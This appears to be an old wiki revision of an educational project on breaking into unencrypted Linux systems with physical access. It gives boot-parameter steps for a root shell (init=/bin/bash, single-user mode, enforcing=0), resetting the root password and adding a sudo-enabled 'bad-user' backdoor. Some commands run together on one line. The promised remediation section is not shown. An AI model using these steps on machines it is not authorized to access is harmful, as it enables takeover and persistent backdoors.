This is an old revision of the document!
To explore the various methods of breaking into any Linux system that doesn't use FDE (Full Disk Encryption) through physical access. Also, to examine the procedure of FDE setup and other remediations to prevent this.
kernel=/vmlinuz-<version> [...parameters...] init=/bin/bash
DONE! THAT'S ALL FOLKS! After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script '/etc/rc.d/rc.sysinit' was bypassed and NOT executed, we need to remount the root file system and make some changes to make the system more usable.:
# mount /proc
You will see an error message complaining that it was already mounted. Ignore it.
mount -o remount,rw /
# cat /etc/fstab
Mount any other needed file systems (Like '/home', '/usr', etc.).
passwd root
adduser -D -u 1000 bad-user passwd bad-user
visudo bad-user ALL=(ALL) ALL
kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S
enforcing=0
In performing this project, the following resources were referenced: